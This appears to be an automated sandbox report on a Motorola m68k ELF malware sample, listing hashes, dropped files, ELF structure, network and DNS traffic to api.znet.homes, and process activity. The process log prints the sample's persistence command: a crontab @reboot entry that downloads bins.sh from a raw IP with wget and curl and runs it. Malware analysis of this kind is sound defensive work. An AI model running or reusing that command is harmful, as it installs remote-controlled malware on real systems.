                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):55
                                                                  Entropy (8bit):2.9050416943122244
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQf:cj/f
                                                                  MD5:C7AF255AF4AAB5CF888851AF0E478F3C
                                                                  SHA1:CC5F08595D87FA46DAB0117FB5AFF2F43C0A5C64
                                                                  SHA-256:F4D0AFB368D97EF5DEFD3CEB3395DCDC564311E637B64B1D34D0FB9B3E48C57B
                                                                  SHA-512:28AE51AC9C80BCDD72E8963133721F0B6F9C8A68118588DC4358968D0D660D578BD4D998FFD89529D180C0B90C42288E697EFF5F58A88A6F452F8B0939091B20
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5998934903835007
                                                                  Encrypted:false
                                                                  SSDEEP:3:f0KaKIRJJQnvf:cKB/H
                                                                  MD5:23308AAF7384B3588CB2D6BDB733B20C
                                                                  SHA1:BBC9254668DFE395041E337597F8975CA58DF80A
                                                                  SHA-256:D5FE0FBE139B1991F7E6100F56292A47E8E6EA482DEC53B45CB2BCF7057B1435
                                                                  SHA-512:3C8B4361B58D0FE6B8EEC28031286255BC2A11F1FA594120BC6EE64C963B324BE5EA44EBE6C77767F5BF88693FB9B59F5DDBA252A43A47B219DC4FEBE52E41A6
                                                                  Malicious:false
                                                                  Preview:6319 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  Process:/tmp/m68k.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):114
                                                                  Entropy (8bit):2.5823496307343774
                                                                  Encrypted:false
                                                                  SSDEEP:3:cjIRJJQnvf:cj/H
                                                                  MD5:AF4674EE6242FC9846F492DA0306A4B4
                                                                  SHA1:D05687EC3162BA02AB435B370173D6A148B32C7F
                                                                  SHA-256:BE1DB8EFDD1EB296D89E5C385D54C5D4F92E673A7E18BBA1AE75A31D1F3A4CF1
                                                                  SHA-512:C679F7D1A9F435C2F0D003F05D64C9A07E102126B1E1BFD092927B66F479ADA776649928301737288E2E6E75E6E6383AF169C806C581EB8C067F21C89D79CD84
                                                                  Malicious:false
                                                                  Preview:6323 (/tmp/m68k.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294962608 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                                  File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                                  Entropy (8bit):6.283969583862141
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:m68k.elf
                                                                  File size:96'464 bytes
                                                                  MD5:22891d6a112648533d76952e9e98ae5b
                                                                  SHA1:c6436285f1f2dea9739fe6144313729f7e24906f
                                                                  SHA256:e733ffe0c07dfcc259485b778c7df83af746579436ccb5b09062313f70bfe3b2
                                                                  SHA512:936c68bedaf997bc7cf204669918506f6234da45092ff51f907014d444f428425c9a9e629d5fc8079a71bd2c14258583b8d2c7e9a6c11467b9e02cb22453b862
                                                                  SSDEEP:1536:jGlvdrsXOmtxMrEdPYuKTS77y8kqX2LQeuacWjcW0JcWcBZ25DH8d1OqeTn3ll6H:ilGXOmtCr2zKc0qmLQeuacWjcW0JcWcD
                                                                  TLSH:F6933AC7F401CD7EF80BE67608E34D156131F6B20E530B369257BFAB9A351D8249AE82
                                                                  File Content Preview:.ELF.......................D...4..v......4. ...(......................e...e....... .......e...............h....... .dt.Q............................NV..a....da...M.N^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, big endian
                                                                  Version:1 (current)
                                                                  Machine:MC68000
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x80000144
                                                                  Flags:0x0
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:3
                                                                  Section Header Offset:95944
                                                                  Section Header Size:40
                                                                  Number of Section Headers:13
                                                                  Header String Table Index:12
                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .initPROGBITS0x800000940x940x140x00x6AX002
                                                                  .textPROGBITS0x800000a80xa80x14e020x00x6AX004
                                                                  .finiPROGBITS0x80014eaa0x14eaa0xe0x00x6AX002
                                                                  .rodataPROGBITS0x80014eb80x14eb80x17110x00x2A002
                                                                  .eh_framePROGBITS0x800185cc0x165cc0x40x00x3WA004
                                                                  .ctorsPROGBITS0x800185d00x165d00x80x00x3WA004
                                                                  .dtorsPROGBITS0x800185d80x165d80x80x00x3WA004
                                                                  .jcrPROGBITS0x800185e00x165e00x40x00x3WA004
                                                                  .dataPROGBITS0x800185e40x165e40x2a00x00x3WA004
                                                                  .bssNOBITS0x800188840x168840x66140x00x3WA004
                                                                  .commentPROGBITS0x00x168840xdec0x00x0001
                                                                  .shstrtabSTRTAB0x00x176700x560x00x0001
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  LOAD0x00x800000000x800000000x165c90x165c96.27330x5R E0x2000.init .text .fini .rodata
                                                                  LOAD0x165cc0x800185cc0x800185cc0x2b80x68cc4.04600x6RW 0x2000.eh_frame .ctors .dtors .jcr .data .bss
                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                                  Download Network PCAP: filteredfull

                                                                  • Total Packets: 33
                                                                  • 1290 undefined
                                                                  • 443 (HTTPS)
                                                                  • 80 (HTTP)
                                                                  • 53 (DNS)
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 23, 2025 23:09:26.842078924 CET4251680192.168.2.23109.202.202.202
                                                                  Mar 23, 2025 23:09:27.869785070 CET43928443192.168.2.2391.189.91.42
                                                                  Mar 23, 2025 23:09:32.910763025 CET39254443192.168.2.2334.249.145.219
                                                                  Mar 23, 2025 23:09:32.910808086 CET4433925434.249.145.219192.168.2.23
                                                                  Mar 23, 2025 23:09:32.910864115 CET39254443192.168.2.2334.249.145.219
                                                                  Mar 23, 2025 23:09:32.911046982 CET39254443192.168.2.2334.249.145.219
                                                                  Mar 23, 2025 23:09:32.911060095 CET4433925434.249.145.219192.168.2.23
                                                                  Mar 23, 2025 23:09:33.017726898 CET597621290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:33.496989012 CET42836443192.168.2.2391.189.91.43
                                                                  Mar 23, 2025 23:09:34.044899940 CET597621290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:34.471966028 CET4326280192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:35.480669022 CET4326280192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:36.056600094 CET597621290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:37.496397972 CET4326280192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:40.152015924 CET597621290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:41.687774897 CET4326280192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:48.342879057 CET597621290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:48.598792076 CET43928443192.168.2.2391.189.91.42
                                                                  Mar 23, 2025 23:09:49.878599882 CET4326280192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:09:56.789612055 CET4251680192.168.2.23109.202.202.202
                                                                  Mar 23, 2025 23:10:00.885181904 CET42836443192.168.2.2391.189.91.43
                                                                  Mar 23, 2025 23:10:04.468681097 CET597621290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:10:06.004410028 CET4326280192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:10:29.552998066 CET43928443192.168.2.2391.189.91.42
                                                                  Mar 23, 2025 23:10:32.902472973 CET39254443192.168.2.2334.249.145.219
                                                                  Mar 23, 2025 23:10:32.948337078 CET4433925434.249.145.219192.168.2.23
                                                                  Mar 23, 2025 23:10:37.743793011 CET597621290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:10:39.791611910 CET4326280192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:10:48.201070070 CET597661290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:10:49.230161905 CET597661290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:10:51.245832920 CET597661290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:10:55.405220032 CET597661290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:11:03.596071959 CET597661290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:11:19.721730947 CET597661290192.168.2.23155.138.230.16
                                                                  Mar 23, 2025 23:11:31.800229073 CET4433925434.249.145.219192.168.2.23
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 23, 2025 23:09:32.896970034 CET5655653192.168.2.231.1.1.1
                                                                  Mar 23, 2025 23:09:33.014949083 CET53565561.1.1.1192.168.2.23
                                                                  Mar 23, 2025 23:10:48.083677053 CET5370553192.168.2.231.1.1.1
                                                                  Mar 23, 2025 23:10:48.199641943 CET53537051.1.1.1192.168.2.23
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Mar 23, 2025 23:09:32.896970034 CET192.168.2.231.1.1.10x8b26Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                                                                  Mar 23, 2025 23:10:48.083677053 CET192.168.2.231.1.1.10x7631Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Mar 23, 2025 23:09:33.014949083 CET1.1.1.1192.168.2.230x8b26No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false
                                                                  Mar 23, 2025 23:10:48.199641943 CET1.1.1.1192.168.2.230x7631No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false

                                                                  System Behavior

                                                                  Start time (UTC):22:09:26
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/tmp/m68k.elf
                                                                  Arguments:/tmp/m68k.elf
                                                                  File size:4463432 bytes
                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                  Start time (UTC):22:09:26
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/tmp/m68k.elf
                                                                  Arguments:-
                                                                  File size:4463432 bytes
                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                  Start time (UTC):22:09:26
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/tmp/m68k.elf
                                                                  Arguments:-
                                                                  File size:4463432 bytes
                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/tmp/m68k.elf
                                                                  Arguments:-
                                                                  File size:4463432 bytes
                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/tmp/m68k.elf
                                                                  Arguments:-
                                                                  File size:4463432 bytes
                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/tmp/m68k.elf
                                                                  Arguments:-
                                                                  File size:4463432 bytes
                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/usr/bin/crontab
                                                                  Arguments:crontab -l
                                                                  File size:43720 bytes
                                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x bins.sh
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:32
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/usr/bin/sh
                                                                  Arguments:sh bins.sh
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:32
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:32
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/curl
                                                                  Arguments:/bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
                                                                  File size:239848 bytes
                                                                  MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:09:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/usr/bin/crontab
                                                                  Arguments:crontab -
                                                                  File size:43720 bytes
                                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                  Start time (UTC):22:10:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:10:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.02dxt6juF6 /tmp/tmp.Fsmp9UZGoQ /tmp/tmp.XCADvBpgho
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):22:10:31
                                                                  Start date (UTC):23/03/2025
